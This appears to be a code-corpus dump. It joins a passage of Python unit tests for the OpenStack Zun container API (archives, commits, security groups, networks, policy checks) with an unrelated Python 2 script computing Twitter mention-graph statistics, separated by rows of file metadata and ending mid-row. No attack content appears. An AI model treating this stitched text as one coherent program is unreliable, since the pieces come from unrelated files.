def test_get_archive_by_uuid(self,
mock_get_by_uuid,
container_get_archive,
mock_validate):
container_get_archive.return_value = ("", "")
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
url = '/v1/containers/%s/%s/' % (container_uuid, 'get_archive')
cmd = {'path': '/home/1.txt'}
response = self.get(url, cmd)
self.assertEqual(200, response.status_int)
container_get_archive.assert_called_once_with(
mock.ANY, test_container_obj, cmd['path'])
def test_get_archive_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Error')
with self.assertRaisesRegex(
AppError,
"Cannot get_archive container %s in Error state" % uuid):
self.get('/v1/containers/%s/%s/' % (test_object.uuid,
'get_archive'))
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_put_archive')
@patch('zun.objects.Container.get_by_uuid')
def test_put_archive_by_uuid(self,
mock_get_by_uuid,
container_put_archive,
mock_validate):
container_put_archive.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
url = '/v1/containers/%s/%s/' % (container_uuid, 'put_archive')
cmd = {'path': '/home/',
'data': '/home/1.tar'}
response = self.post(url, cmd)
self.assertEqual(200, response.status_int)
container_put_archive.assert_called_once_with(
mock.ANY, test_container_obj, cmd['path'], cmd['data'])
def test_put_archive_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Error')
with self.assertRaisesRegex(
AppError,
"Cannot put_archive container %s in Error state" % uuid):
self.post('/v1/containers/%s/%s/' % (test_object.uuid,
'put_archive'))
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_stats')
@patch('zun.objects.Container.get_by_uuid')
def test_stats_container_by_uuid(self, mock_get_by_uuid,
mock_container_stats, mock_validate):
mock_container_stats.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
url = '/v1/containers/%s/stats'\
% container_uuid
response = self.get(url)
self.assertEqual(200, response.status_int)
self.assertTrue(mock_container_stats.called)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_commit')
@patch('zun.objects.Container.get_by_name')
def test_commit_by_name(self, mock_get_by_name,
mock_container_commit, mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_name.return_value = test_container_obj
mock_container_commit.return_value = None
container_name = test_container.get('name')
url = '/v1/containers/%s/%s/' % (container_name, 'commit')
cmd = {'repository': 'repo', 'tag': 'tag'}
response = self.post(url, cmd)
self.assertEqual(202, response.status_int)
mock_container_commit.assert_called_once_with(
mock.ANY, test_container_obj, cmd['repository'], cmd['tag'])
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_commit')
@patch('zun.objects.Container.get_by_uuid')
def test_commit_by_uuid(self, mock_get_by_uuid,
mock_container_commit, mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
mock_container_commit.return_value = None
container_uuid = test_container.get('uuid')
url = '/v1/containers/%s/%s/' % (container_uuid, 'commit')
cmd = {'repository': 'repo', 'tag': 'tag'}
response = self.post(url, cmd)
self.assertEqual(202, response.status_int)
mock_container_commit.assert_called_once_with(
mock.ANY, test_container_obj, cmd['repository'], cmd['tag'])
def test_commit_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
cmd = {'repository': 'repo', 'tag': 'tag'}
utils.create_test_container(context=self.context,
uuid=uuid, status='Error')
with self.assertRaisesRegex(
AppError, "Cannot commit container %s in Error state" % uuid):
self.post('/v1/containers/%s/commit/' % uuid, cmd)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_exec_resize')
@patch('zun.api.utils.get_resource')
def test_execute_resize_container_exec(
self, mock_get_resource, mock_exec_resize, mock_validate):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_resource.return_value = test_container_obj
mock_exec_resize.return_value = None
container_name = test_container.get('name')
url = '/v1/containers/%s/%s/' % (container_name, 'execute_resize')
fake_exec_id = ('7df36611fa1fc855618c2c643835d41d'
'ac3fe568e7688f0bae66f7bcb3cccc6c')
kwargs = {'exec_id': fake_exec_id, 'h': '100', 'w': '100'}
response = self.post(url, kwargs)
self.assertEqual(200, response.status_int)
mock_exec_resize.assert_called_once_with(
mock.ANY, test_container_obj, fake_exec_id, kwargs['h'],
kwargs['w'])
@mock.patch('zun.compute.api.API.add_security_group')
@mock.patch('zun.network.neutron.NeutronAPI.find_resourceid_by_name_or_id')
@mock.patch('zun.api.utils.get_resource')
def test_add_security_group_by_uuid(self, mock_get_resource,
mock_find_resourceid,
mock_add_security_group):
headers = {"OpenStack-API-Version": "container 1.14"}
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_resource.return_value = test_container_obj
mock_find_resourceid.return_value = 'fake_security_group_id'
container_name = test_container.get('name')
security_group_id_to_add = '5f7cf831-9a9c-4e2b-87b2-6081667f852b'
url = '/v1/containers/%s/%s?name=%s' % (container_name,
'add_security_group',
security_group_id_to_add)
response = self.post(url, headers=headers)
self.assertEqual(202, response.status_int)
self.assertEqual('application/json', response.content_type)
mock_find_resourceid.assert_called_once_with(
'security_group', security_group_id_to_add, mock.ANY)
mock_add_security_group.assert_called_once_with(
mock.ANY, test_container_obj, 'fake_security_group_id')
@mock.patch('zun.compute.api.API.add_security_group')
@mock.patch('zun.network.neutron.NeutronAPI.find_resourceid_by_name_or_id')
@mock.patch('zun.api.utils.get_resource')
def test_add_security_group_not_found(self, mock_get_resource,
mock_find_resourceid,
mock_add_security_group):
headers = {"OpenStack-API-Version": "container 1.14"}
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_resource.return_value = test_container_obj
mock_find_resourceid.side_effect = n_exc.NotFound()
container_name = test_container.get('name')
security_group_to_add = '5f7cf831-9a9c-4e2b-87b2-6081667f852b'
url = '/v1/containers/%s/%s?name=%s' % (container_name,
'add_security_group',
security_group_to_add)
response = self.post(url, expect_errors=True, headers=headers)
self.assertEqual(400, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual(
"Security group %s not found." % security_group_to_add,
response.json['errors'][0]['detail'])
@mock.patch('zun.compute.api.API.add_security_group')
@mock.patch('zun.network.neutron.NeutronAPI.find_resourceid_by_name_or_id')
@mock.patch('zun.api.utils.get_resource')
def test_add_security_group_not_unique_match(self, mock_get_resource,
mock_find_resourceid,
mock_add_security_group):
headers = {"OpenStack-API-Version": "container 1.14"}
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_resource.return_value = test_container_obj
mock_find_resourceid.side_effect = n_exc.NeutronClientNoUniqueMatch()
container_name = test_container.get('name')
security_group_to_add = '5f7cf831-9a9c-4e2b-87b2-6081667f852b'
url = '/v1/containers/%s/%s?name=%s' % (container_name,
'add_security_group',
security_group_to_add)
response = self.post(url, expect_errors=True, headers=headers)
self.assertEqual(409, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual(
"Multiple security group matches found for name %s, "
"use an ID to be more specific." % security_group_to_add,
response.json['errors'][0]['detail'])
@patch('zun.network.neutron.NeutronAPI.get_neutron_network')
@patch('zun.compute.api.API.network_attach')
@patch('zun.objects.Container.get_by_uuid')
def test_network_attach(self, mock_by_uuid, mock_attach, mock_get_network):
built_requested_network = {
'network': 'fake-net-id',
'port': '',
'router:external': False,
'shared': False,
'fixed_ip': '',
'preserve_on_delete': False}
query = 'network=private'
self._test_network_attach(mock_by_uuid, mock_attach, mock_get_network,
query, built_requested_network)
mock_get_network.assert_called_once_with('private')
@patch('zun.network.neutron.NeutronAPI.get_neutron_network')
@patch('zun.compute.api.API.network_attach')
@patch('zun.objects.Container.get_by_uuid')
def test_network_attach_with_fixed_ip(self, mock_by_uuid, mock_attach,
mock_get_network):
built_requested_network = {
'network': 'fake-net-id',
'port': '',
'router:external': False,
'shared': False,
'fixed_ip': '10.0.0.3',
'preserve_on_delete': False}
query = 'network=private&fixed_ip=10.0.0.3'
self._test_network_attach(mock_by_uuid, mock_attach, mock_get_network,
query, built_requested_network)
mock_get_network.assert_called_once_with('private')
@patch('zun.network.neutron.NeutronAPI.get_neutron_port')
@patch('zun.network.neutron.NeutronAPI.ensure_neutron_port_usable')
@patch('zun.network.neutron.NeutronAPI.get_neutron_network')
@patch('zun.compute.api.API.network_attach')
@patch('zun.objects.Container.get_by_uuid')
def test_network_attach_with_port(self, mock_by_uuid, mock_attach,
mock_get_network,
mock_ensure, mock_get_port):
mock_get_port.return_value = {
'id': 'fake-port-id',
'network_id': 'fake-net-id',
}
built_requested_network = {
'network': 'fake-net-id',
'port': 'fake-port-id',
'router:external': False,
'shared': False,
'fixed_ip': '',
'preserve_on_delete': True}
query = 'port=fake-port'
self._test_network_attach(mock_by_uuid, mock_attach, mock_get_network,
query, built_requested_network)
mock_get_port.assert_called_once_with('fake-port')
mock_get_network.assert_called_once_with('fake-net-id')
def _test_network_attach(self, mock_by_uuid, mock_attach, mock_get_network,
query, built_requested_network):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
fake_network = {'id': 'fake-net-id',
'router:external': False,
'shared': False}
mock_get_network.return_value = fake_network
url = '/v1/containers/%s/%s?%s' % (container_uuid, 'network_attach',
query)
response = self.post(url)
self.assertEqual(200, response.status_int)
mock_attach.assert_called_once_with(mock.ANY, test_container_obj,
built_requested_network)
@patch('zun.network.neutron.NeutronAPI.get_neutron_network')
@patch('zun.compute.api.API.network_detach')
@patch('zun.objects.Container.get_by_uuid')
def test_network_detach(self, mock_by_uuid, mock_detach, mock_get_network):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
mock_get_network.return_value = {'id': 'private'}
mock_detach.return_value = None
url = '/v1/containers/%s/%s?network=%s' % (container_uuid,
'network_detach',
'private')
response = self.post(url)
self.assertEqual(202, response.status_int)
mock_detach.assert_called_once_with(mock.ANY, test_container_obj,
'private')
@patch('zun.network.neutron.NeutronAPI.get_neutron_port')
@patch('zun.compute.api.API.network_detach')
@patch('zun.objects.Container.get_by_uuid')
def test_network_detach_with_port(self, mock_by_uuid, mock_detach,
mock_get_port):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
mock_get_port.return_value = {'network_id': 'fake-net-id'}
mock_detach.return_value = None
url = '/v1/containers/%s/%s?port=%s' % (container_uuid,
'network_detach',
'fake-port')
response = self.post(url)
self.assertEqual(202, response.status_int)
mock_detach.assert_called_once_with(mock.ANY, test_container_obj,
'fake-net-id')
@patch('zun.objects.Container.get_by_uuid')
def test_network_list(self, mock_container_get_by_uuid):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
url = '/v1/containers/%s/%s' % (container_uuid, 'network_list')
response = self.get(url)
self.assertEqual(200, response.status_int)
mock_container_get_by_uuid.assert_called_once_with(
mock.ANY,
test_container['uuid'])
self._assert_networks(test_container['addresses'],
response.json['networks'])
def _assert_networks(self, addresses, networks):
self.assertEqual(len(addresses), len(networks))
for network in networks:
address_list = addresses[network['net_id']]
self.assertEqual(len(address_list), len(network['fixed_ips']))
for address in address_list:
matched = 0
for fixed_ip in network['fixed_ips']:
if (address['addr'] == fixed_ip['ip_address'] and
address['version'] == fixed_ip['version'] and
address['subnet_id'] == fixed_ip['subnet_id'] and
address['port'] == network['port_id']):
matched += 1
self.assertEqual(1, matched)
@mock.patch('zun.compute.api.API.remove_security_group')
@mock.patch('zun.network.neutron.NeutronAPI.find_resourceid_by_name_or_id')
@mock.patch('zun.api.utils.get_resource')
def test_remove_security_group_by_uuid(self, mock_get_resource,
mock_find_resourceid,
mock_remove_security_group):
headers = {"OpenStack-API-Version": "container 1.14"}
test_container = utils.get_test_container(
security_groups=['affb9021-964d-4b1b-80a8-9b9db60497e4'])
test_container_obj = objects.Container(self.context, **test_container)
mock_get_resource.return_value = test_container_obj
mock_find_resourceid.return_value = \
test_container_obj.security_groups[0]
container_name = test_container.get('name')
security_group_id_to_remove = test_container_obj.security_groups[0]
url = '/v1/containers/%s/%s?name=%s' % (container_name,
'remove_security_group',
security_group_id_to_remove)
response = self.post(url, headers=headers)
self.assertEqual(202, response.status_int)
self.assertEqual('application/json', response.content_type)
mock_find_resourceid.assert_called_once_with(
'security_group', security_group_id_to_remove, mock.ANY)
mock_remove_security_group.assert_called_once_with(
mock.ANY, test_container_obj,
test_container_obj.security_groups[0])
class TestContainerEnforcement(api_base.FunctionalTest):
def _common_policy_check(self, rule, func, *arg, **kwarg):
rules = dict({rule: 'project_id:non_fake'},
**kwarg.pop('bypass_rules', {}))
self.policy.set_rules(rules)
response = func(*arg, **kwarg)
self.assertEqual(403, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule,
response.json['errors'][0]['detail'])
def test_policy_disallow_get_all(self):
self._common_policy_check(
'container:get_all', self.get, '/v1/containers/',
expect_errors=True)
def test_policy_disallow_get_all_all_projects(self):
self._common_policy_check(
'container:get_all_all_projects',
self.get, '/v1/containers/?all_projects=1',
expect_errors=True,
bypass_rules={'container:get_all': 'project_id:fake_project'})
def test_policy_disallow_get_one(self):
container = obj_utils.create_test_container(self.context)
self._common_policy_check(
'container:get_one', self.get,
'/v1/containers/%s/' % container.uuid,
expect_errors=True)
def test_policy_disallow_get_one_all_projects(self):
container = obj_utils.create_test_container(self.context)
self._common_policy_check(
'container:get_one_all_projects', self.get,
'/v1/containers/%s/?all_projects=1' % container.uuid,
expect_errors=True)
def test_policy_disallow_update(self):
container = obj_utils.create_test_container(self.context)
params = {'cpu': 1}
self._common_policy_check(
'container:update', self.patch_json,
'/containers/%s/' % container.uuid, params,
expect_errors=True)
def test_policy_disallow_create(self):
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512"}')
self._common_policy_check(
'container:create', self.post, '/v1/containers/',
params=params,
content_type='application/json',
expect_errors=True)
def test_policy_disallow_delete(self):
container = obj_utils.create_test_container(self.context)
self._common_policy_check(
'container:delete', self.delete,
'/v1/containers/%s/' % container.uuid,
expect_errors=True)
def test_policy_disallow_delete_all_projects(self):
container = obj_utils.create_test_container(self.context)
self._common_policy_check(
'container:delete_all_projects', self.delete,
'/v1/containers/%s/?all_projects=1' % container.uuid,
expect_errors=True)
def test_policy_disallow_delete_force(self):
container = obj_utils.create_test_container(self.context)
self._common_policy_check(
'container:delete_force', self.delete,
'/v1/containers/%s/?force=True' % container.uuid,
expect_errors=True,
bypass_rules={'container:delete': 'project_id:fake_project'})
def _owner_check(self, rule, func, *args, **kwargs):
self.policy.set_rules({rule: "user_id:%(user_id)s"})
response = func(*args, **kwargs)
self.assertEqual(403, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(
"Policy doesn't allow %s to be performed." % rule,
response.json['errors'][0]['detail'])
def test_policy_only_owner_get_one(self):
container = obj_utils.create_test_container(self.context,
user_id='another')
self._owner_check("container:get_one", self.get_json,
'/containers/%s/' % container.uuid,
expect_errors=True)
def test_policy_only_owner_update(self):
container = obj_utils.create_test_container(self.context,
user_id='another')
self._owner_check(
"container:update", self.patch_json,
'/containers/%s/' % container.uuid,
{'cpu': 1},
expect_errors=True)
def test_policy_only_owner_delete(self):
container = obj_utils.create_test_container(self.context,
user_id='another')
self._owner_check(
"container:delete", self.delete,
'/containers/%s/' % container.uuid,
expect_errors=True)
def test_policy_only_owner_logs(self):
container = obj_utils.create_test_container(self.context,
user_id='another')
self._owner_check("container:logs", self.get_json,
'/containers/%s/logs/' % container.uuid,
expect_errors=True)
def test_policy_only_owner_execute(self):
container = obj_utils.create_test_container(self.context,
user_id='another')
self._owner_check("container:execute", self.post_json,
'/containers/%s/execute/' % container.uuid,
params={'command': 'ls'}, expect_errors=True)
def test_policy_only_owner_actions(self):
actions = ['start', 'stop', 'reboot', 'pause', 'unpause']
container = obj_utils.create_test_container(self.context,
user_id='another')
for action in actions:
self._owner_check('container:%s' % action, self.post_json,
'/containers/%s/%s/' % (container.uuid, action),
{}, expect_errors=True)
class TestContainerActionController(api_base.FunctionalTest):
def _format_action(self, action, expect_traceback=True):
'''Remove keys that aren't serialized.'''
to_delete = ('id', 'finish_time', 'created_at', 'updated_at',
'deleted_at', 'deleted')
for key in to_delete:
if key in action:
del (action[key])
for event in action.get('events', []):
self._format_event(event, expect_traceback)
return action
def _format_event(self, event, expect_traceback=True):
'''Remove keys that aren't serialized.'''
to_delete = ['id', 'created_at', 'updated_at', 'deleted_at', 'deleted',
'action_id']
if not expect_traceback:
event['traceback'] = None
for key in to_delete:
if key in event:
del (event[key])
return event
@mock.patch('zun.objects.Container.get_by_uuid')
@mock.patch('zun.objects.ContainerAction.get_by_container_uuid')
def test_list_actions(self, mock_get_by_container_uuid,
mock_container_get_by_uuid):
test_container = utils.get_test_container()
test_action = utils.get_test_action_value(
container_uuid=test_container['uuid'])
container_object = objects.Container(self.context, **test_container)
action_object = objects.ContainerAction(self.context, **test_action)
mock_container_get_by_uuid.return_value = container_object
mock_get_by_container_uuid.return_value = [action_object]
response = self.get('/v1/containers/%s/container_actions' %
test_container['uuid'])
mock_get_by_container_uuid.assert_called_once_with(
mock.ANY,
test_container['uuid'])
self.assertEqual(200, response.status_int)
self.assertEqual(
self._format_action(test_action),
self._format_action(response.json['containerActions'][0]))
@mock.patch('zun.objects.Container.get_by_uuid')
@mock.patch('zun.common.policy.enforce')
@mock.patch('zun.objects.ContainerActionEvent.get_by_action')
@mock.patch('zun.objects.ContainerAction.get_by_request_id')
def test_get_action_with_events_allowed(self, mock_get_by_request_id,
mock_get_by_action, mock_policy,
mock_container_get_by_uuid):
mock_policy.return_value = True
test_container = utils.get_test_container()
test_action = utils.get_test_action_value(
container_uuid=test_container['uuid'])
test_event = utils.get_test_action_event_value(
action_id=test_action['id'])
test_action['events'] = [test_event]
container_object = objects.Container(self.context, **test_container)
action_object = objects.ContainerAction(self.context, **test_action)
event_object = objects.ContainerActionEvent(self.context, **test_event)
mock_container_get_by_uuid.return_value = container_object
mock_get_by_request_id.return_value = action_object
mock_get_by_action.return_value = [event_object]
response = self.get('/v1/containers/%s/container_actions/%s' % (
test_container['uuid'], test_action['request_id']))
mock_get_by_request_id.assert_called_once_with(
mock.ANY, test_container['uuid'], test_action['request_id'])
mock_get_by_action.assert_called_once_with(mock.ANY, test_action['id'])
self.assertEqual(200, response.status_int)
self.assertEqual(self._format_action(test_action),
self._format_action(response.json))
@mock.patch('zun.objects.Container.get_by_uuid')
@mock.patch('zun.common.policy.enforce')
@mock.patch('zun.objects.ContainerActionEvent.get_by_action')
@mock.patch('zun.objects.ContainerAction.get_by_request_id')
def test_get_action_with_events_not_allowed(self, mock_get_by_request_id,
mock_get_by_action,
mock_policy,
mock_container_get_by_uuid):
mock_policy.return_value = False
test_container = utils.get_test_container()
container_obj = objects.Container(self.context, **test_container)
test_action = utils.get_test_action_value(
container_uuid=test_container['uuid'])
test_event = utils.get_test_action_event_value(
action_id=test_action['id'])
test_action['events'] = [test_event]
action_object = objects.ContainerAction(self.context, **test_action)
event_object = objects.ContainerActionEvent(self.context, **test_event)
mock_container_get_by_uuid.return_value = container_obj
mock_get_by_request_id.return_value = action_object
mock_get_by_action.return_value = [event_object]
response = self.get('/v1/containers/%s/container_actions/%s' % (
test_container['uuid'], test_action['request_id']))
mock_get_by_request_id.assert_called_once_with(
mock.ANY, test_container['uuid'], test_action['request_id'])
mock_get_by_action.assert_called_once_with(mock.ANY, test_action['id'])
self.assertEqual(200, response.status_int)
self.assertEqual(self._format_action(test_action,
expect_traceback=False),
self._format_action(response.json))
@mock.patch('zun.objects.Container.get_by_uuid')
@mock.patch('zun.objects.ContainerAction.get_by_request_id')
def test_action_not_found(self, mock_get_by_request_id,
mock_container_get_by_uuid):
test_container = utils.get_test_container()
container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_uuid.return_value = container_obj
mock_get_by_request_id.return_value = None
fake_request_id = 'request'
self.assertRaises(AppError, self.get,
('/v1/containers/%s/container_actions/%s' %
(test_container['uuid'], fake_request_id)))
mock_get_by_request_id.assert_called_once_with(
mock.ANY, test_container['uuid'], fake_request_id)
@mock.patch('zun.objects.Container.get_by_uuid')
def test_container_not_found(self, mock_container_get_by_uuid):
test_container = utils.get_test_container()
self.assertRaises(AppError, self.get,
('/v1/containers/%s/container_actions'
% test_container['uuid']))
mock_container_get_by_uuid.assert_called_once_with(
mock.ANY, test_container['uuid'])
class TestContainerActionEnforcement(api_base.FunctionalTest):
def _common_policy_check(self, rule, func, *arg, **kwarg):
rules = dict({rule: 'project_id:non_fake'},
**kwarg.pop('bypass_rules', {}))
self.policy.set_rules(rules)
response = func(*arg, **kwarg)
self.assertEqual(403, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule,
response.json['errors'][0]['detail'])
def test_list_actions_disallow_by_project(self):
container = obj_utils.create_test_container(self.context)
self._common_policy_check(
'container:actions', self.get,
'/v1/containers/%s/container_actions/' % container.uuid,
expect_errors=True)
def test_get_action_disallow_by_project(self):
container = obj_utils.create_test_container(self.context)
self._common_policy_check(
'container:actions', self.get,
'/v1/containers/%s/container_actions/fake_request' %
container.uuid, expect_errors=True)
| 49.685961
| 79
| 0.614242
| 12,710
| 115,023
| 5.246184
| 0.037451
| 0.07896
| 0.032394
| 0.027265
| 0.893955
| 0.868249
| 0.852187
| 0.827742
| 0.809445
| 0.795228
| 0
| 0.012096
| 0.272632
| 115,023
| 2,314
| 80
| 49.707433
| 0.78489
| 0.014006
| 0
| 0.708762
| 0
| 0
| 0.19813
| 0.106744
| 0
| 0
| 0
| 0.000432
| 0.17768
| 1
| 0.066569
| false
| 0.001958
| 0.004895
| 0
| 0.07489
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2203e391f57e7f400cc2cc55493f30b9bb268af6
| 4,826
|
py
|
Python
|
src_graph/edges_all_MENT_per_MO_TOT_ST.py
|
sanja7s/SR_Twitter
|
2eb499c9aa25ba6e9860cd77eac6832890d2c126
|
[
"MIT"
] | null | null | null |
src_graph/edges_all_MENT_per_MO_TOT_ST.py
|
sanja7s/SR_Twitter
|
2eb499c9aa25ba6e9860cd77eac6832890d2c126
|
[
"MIT"
] | null | null | null |
src_graph/edges_all_MENT_per_MO_TOT_ST.py
|
sanja7s/SR_Twitter
|
2eb499c9aa25ba6e9860cd77eac6832890d2c126
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
from the data of edge formation/deletion, find the persisting edges and their monthly REL ST
"""
from collections import defaultdict
import codecs
import os
import json
import numpy as np
from igraph import *
IN_DIR = "../../../DATA/General/"
os.chdir(IN_DIR)
F_IN = "mention/edge_formation_deletion_MOs.dat"
MONTHS = ["5", "6", "7", "8", "9", "10", "11"]
#########################
# read from a file that is an edge list with weights
#########################
def read_in_MO_graph(MO):
G = Graph.Read_Ncol('mention/' + MO + '_MENT_weight_dir_self_loops', directed=True, weights=True)
print G.summary()
return G
def read_in_MO_graph_MUTUAL_UNW(MO):
G = Graph.Read_Ncol('mention/' + MO + '_MENT_weight_dir_self_loops', directed=True, weights=True)
G.to_undirected(mode="mutual", combine_edges='ignore')
print G.summary()
return G
def extract_edges_per_MO_REL_ST_with_STDEV_POP():
MO_MENT = defaultdict(int)
for MO in MONTHS:
MO_MENT[MO] = read_in_MO_graph(MO).copy()
cnt = 0
TOT = defaultdict(list)
i = 0
N = 7
MO = MONTHS[i]
while i < N-1:
G = MO_MENT[MO]
for e in G.es:
src_id = e.source
dest_id = e.target
try:
popA = G.strength(src_id, mode=IN, weights='weight')
except IndexError:
popA = 0
try:
popB = G.strength(dest_id, mode=IN, weights='weight')
except IndexError:
popB = 0
diff = abs(popA + popB)
TOT[MO].append(diff)
i += 1
MO = MONTHS[i]
print "processed %d edges " % cnt
cnt = float(cnt)
for MO in MONTHS[:-1]:
TOT[MO] = np.array(TOT[MO])
avg = np.nanmean(TOT[MO])
std = np.nanstd(TOT[MO])
print TOT[MO]
print "Average REL ST POP, stdev %f, %f, at the time %s " % \
(avg, std, MO)
def extract_edges_per_MO_REL_ST_with_STDEV_ACT():
MO_MENT = defaultdict(int)
for MO in MONTHS:
MO_MENT[MO] = read_in_MO_graph(MO).copy()
cnt = 0
TOT = defaultdict(list)
i = 0
N = 7
MO = MONTHS[i]
while i < N-1:
G = MO_MENT[MO]
for e in G.es:
src_id = e.source
dest_id = e.target
#userA = G.vs[src_id]['name']
#uesrB = G.vs[dest_id]['name']
try:
popA = G.strength(src_id, mode=OUT, weights='weight')
except IndexError:
popA = 0
try:
popB = G.strength(dest_id, mode=OUT, weights='weight')
except IndexError:
popB = 0
diff = abs(popA + popB)
TOT[MO].append(diff)
i += 1
MO = MONTHS[i]
print "processed %d edges " % cnt
cnt = float(cnt)
for MO in MONTHS[:-1]:
TOT[MO] = np.array(TOT[MO])
avg = np.nanmean(TOT[MO])
std = np.nanstd(TOT[MO])
print TOT[MO]
print "Average REL ST ACT, stdev %f, %f, at the time %s " % \
(avg, std, MO)
def extract_edges_per_MO_REL_ST_with_STDEV_MUTUAL_UNW():
MO_MENT = defaultdict(int)
for MO in MONTHS:
# strong
MO_MENT[MO] = read_in_MO_graph_MUTUAL_UNW(MO).copy()
# weak
#MO_MENT[MO] = read_in_MO_graph(MO).copy()
cnt = 0
TOT = defaultdict(list)
i = 0
N = 7
MO = MONTHS[i]
while i < N-1:
G = MO_MENT[MO]
for e in G.es:
src_id = e.source
dest_id = e.target
try:
popA = G.degree(src_id)
except IndexError:
popA = 0
try:
popB = G.degree(dest_id)
except IndexError:
popB = 0
diff = abs(popA + popB)
if diff == 552:
userA = G.vs[src_id]['name']
uesrB = G.vs[dest_id]['name']
print popA, popB
print userA, uesrB
TOT[MO].append(diff)
i += 1
MO = MONTHS[i]
print "processed %d edges " % cnt
cnt = float(cnt)
for MO in MONTHS[:-1]:
TOT[MO] = np.array(TOT[MO])
avg = np.mean(TOT[MO])
std = np.std(TOT[MO])
print TOT[MO]
print "Average TOT ST MUTUAL CONTACTS, stdev %f, %f, at the time %s " % \
(avg, std, MO)
def extract_edges_per_MO_REL_ST_with_STDEV_TOTAL_UNW():
MO_MENT = defaultdict(int)
for MO in MONTHS:
# strong
#MO_MENT[MO] = read_in_MO_graph_MUTUAL_UNW(MO).copy()
# weak
MO_MENT[MO] = read_in_MO_graph(MO).copy()
cnt = 0
TOT = defaultdict(list)
i = 0
N = 7
MO = MONTHS[i]
while i < N-1:
G = MO_MENT[MO]
for e in G.es:
src_id = e.source
dest_id = e.target
try:
popA = G.degree(src_id)
except IndexError:
popA = 0
try:
popB = G.degree(dest_id)
except IndexError:
popB = 0
diff = abs(popA + popB)
if diff == 552:
userA = G.vs[src_id]['name']
uesrB = G.vs[dest_id]['name']
print popA, popB
print userA, uesrB
TOT[MO].append(diff)
i += 1
MO = MONTHS[i]
print "processed %d edges " % cnt
cnt = float(cnt)
for MO in MONTHS[:-1]:
TOT[MO] = np.array(TOT[MO])
avg = np.mean(TOT[MO])
std = np.std(TOT[MO])
print TOT[MO]
print "Average TOT ST TOTAL CONTACTS, stdev %f, %f, at the time %s " % \
(avg, std, MO)
print 'Strong'
extract_edges_per_MO_REL_ST_with_STDEV_MUTUAL_UNW()
print 'Total, including weak'
extract_edges_per_MO_REL_ST_with_STDEV_TOTAL_UNW()
| 20.362869
| 98
| 0.629092
| 823
| 4,826
| 3.521264
| 0.162819
| 0.041408
| 0.027605
| 0.035887
| 0.857833
| 0.852312
| 0.837474
| 0.811939
| 0.811939
| 0.800207
| 0
| 0.012732
| 0.218815
| 4,826
| 236
| 99
| 20.449153
| 0.755968
| 0.055325
| 0
| 0.82659
| 0
| 0
| 0.117138
| 0.026208
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.034682
| null | null | 0.115607
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
223818086e1736153ffe37499d2cded0a4b4514e
| 45
|
py
|
Python
|
data/typing/numpy.random._pcg64.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | 67
|
2020-08-17T11:53:26.000Z
|
2021-11-08T20:16:06.000Z
|
data/typing/numpy.random._pcg64.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | 36
|
